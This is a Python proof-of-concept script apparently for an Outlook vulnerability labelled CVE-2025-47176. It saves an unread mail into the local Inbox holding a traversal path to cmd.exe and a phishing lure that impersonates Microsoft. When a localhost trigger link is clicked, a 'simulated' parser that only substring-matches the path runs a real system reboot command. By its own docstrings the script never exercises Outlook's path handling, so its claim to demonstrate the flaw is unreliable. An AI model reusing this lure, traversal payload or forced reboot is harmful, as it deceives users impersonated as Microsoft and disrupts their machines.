#!/usr/bin/python
import win32com.client
import threading
import time
import subprocess
import os
from http.server import HTTPServer, BaseHTTPRequestHandler

# Settings for the self-contained demonstration. TRIGGER_URL is derived from
# HTTP_PORT so the link written into the mail and the local listener agree.
HTTP_PORT = 8080
CHECK_DELAY = 10  # seconds main() sleeps between saving the mail and starting the listener
# Traversal-style relative path placed in the mail body; within this script it
# is only ever substring-checked by simulate_vulnerable_parser, never opened.
MALICIOUS_PATH = r"..\..\..\windows\system32\cmd.exe"
TRIGGER_URL = "http://localhost:" + str(HTTP_PORT) + "/activate"
MAIL_SUBJECT = "PoC CVE-2025-47176 - Injected Sync Path"


def inject_malicious_mail():
    """Save an unread HTML mail item into the local Outlook default Inbox.

    Drives the locally installed Outlook through its COM automation object
    (``Outlook.Application`` / MAPI namespace), so it only touches the mailbox
    of the user running the script; the item is saved, never sent. The body
    embeds MALICIOUS_PATH as visible text and a link to TRIGGER_URL.

    Returns:
        True when the item was saved; False when any step raised, in which
        case the exception is printed and swallowed (best-effort by design).
    """
    OL_FOLDER_INBOX = 6  # olFolderInbox in the Outlook OlDefaultFolders enumeration
    try:
        print("[*] Connecting to Outlook COM interface...")
        app = win32com.client.Dispatch("Outlook.Application")
        mapi = app.GetNamespace("MAPI")
        inbox_folder = mapi.GetDefaultFolder(OL_FOLDER_INBOX)

        print("[+] Creating mail item with malicious sync path payload...")
        # Built before the item exists; pure string formatting, no side effects.
        body_html = f"""
        <html>
            <body>
                <p>Injected Sync Path: {MALICIOUS_PATH}</p>
                <p>Please click on the Update link to patch your Outlook security and privacy! Best Microsoft: <a href="{TRIGGER_URL}">here to activate the payload</a>.</p>
            </body>
        </html>
        """
        item = inbox_folder.Items.Add("IPM.Note")
        item.Subject = MAIL_SUBJECT
        item.HTMLBody = body_html
        item.UnRead = True
        item.Save()
        print("[+] Mail item saved and marked unread.")
        return True
    except Exception as e:
        print(f"[!] Failed to inject mail: {e}")
        return False


def normalize_path(path):
    """Return *path* with ``.``/``..`` segments and redundant separators collapsed.

    Thin wrapper over os.path.normpath: purely lexical, nothing is resolved
    against the filesystem, and a relative input stays relative.
    """
    collapsed = os.path.normpath(path)
    return collapsed


def simulate_vulnerable_parser(path):
    """Stand-in for a path consumer: request a reboot if *path* names cmd.exe.

    Nothing here exercises Outlook's own handling of the path. The "trigger
    condition" is a case-insensitive substring test for ``cmd.exe`` on the
    normalized path, so the outcome is decided entirely by the caller's input.
    On a match ``shutdown /r /t 5`` is issued via subprocess.call; a missing
    executable (FileNotFoundError) is printed rather than raised, while a
    non-zero exit status is not reported at all.
    """
    print(f"[>] Original path: {path}")
    collapsed = normalize_path(path)
    print(f"[!] Normalized path: {collapsed}")

    if "cmd.exe" not in collapsed.lower():
        print("[+] No execution triggered.")
        return

    print("[!] Trigger condition met! Simulating system restart...")
    try:
        subprocess.call(["shutdown", "/r", "/t", "5"])
    except Exception as e:
        print(f"[!] Failed to execute restart command: {e}")
    else:
        print("[+] Restart command issued. System will reboot in 5 seconds.")


class TriggerHandler(BaseHTTPRequestHandler):
    """Serve the single trigger link embedded in the injected mail.

    GET /activate runs simulate_vulnerable_parser on MALICIOUS_PATH, answers
    200 with a short HTML page, then stops the owning server from a helper
    thread (BaseServer.shutdown() waits for serve_forever() to exit, so it
    must not run on the request thread). Any other path gets a bare 404.
    No origin or authentication check is performed: every client that can
    reach the listener can fire the trigger.
    """

    _ACTIVATE_PATH = "/activate"
    _ACTIVATED_PAGE = b"<html><body><h1>Payload Activated. Rebooting soon.</h1></body></html>"

    def do_GET(self):
        if self.path != self._ACTIVATE_PATH:
            self.send_response(404)
            self.end_headers()
            return
        self._activate()

    def _activate(self):
        """Run the simulated parser, reply, and schedule server shutdown."""
        print("[!] Trigger link clicked! Activating payload...")
        simulate_vulnerable_parser(MALICIOUS_PATH)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(self._ACTIVATED_PAGE)
        # Off-thread: shutdown() would deadlock if called from the serving thread.
        threading.Thread(target=self.server.shutdown, daemon=True).start()


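def run_http_server(host="127.0.0.1"):
    """Serve trigger-link requests until a handler calls server.shutdown().

    Args:
        host: Interface to bind. Defaults to loopback: the link written into
            the mail (TRIGGER_URL) points at localhost, and the /activate
            endpoint performs no authentication, so listening on every
            interface (the original ``""``) needlessly exposed the trigger to
            any host that can reach port HTTP_PORT. Pass ``""`` explicitly to
            get the old all-interfaces binding.

    The server is used as a context manager so its listening socket is closed
    once serve_forever() returns; the original left it open.
    """
    with HTTPServer((host, HTTP_PORT), TriggerHandler) as httpd:
        print(f"[*] HTTP Server listening on port {HTTP_PORT} for trigger link clicks...")
        httpd.serve_forever()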


def main():
    """Run the demonstration end to end: inject the mail, pause, serve the link.

    Aborts without starting the listener when inject_malicious_mail() reports
    failure. run_http_server() blocks until the /activate handler shuts the
    server down, so the closing message prints only after the link was used.
    """
    banner = "=" * 60
    print(banner)
    print("[+] Starting CVE-2025-47176 PoC simulation")

    injected = inject_malicious_mail()
    if not injected:
        print("[!] Injection failed, aborting.")
        return

    print(f"[*] Waiting {CHECK_DELAY} seconds for mail to be processed by Outlook...")
    time.sleep(CHECK_DELAY)

    run_http_server()
    print("[*] HTTP server stopped. Exiting.")


# Script entry point; importing the module does not start the demonstration.
if __name__ == "__main__":
    main()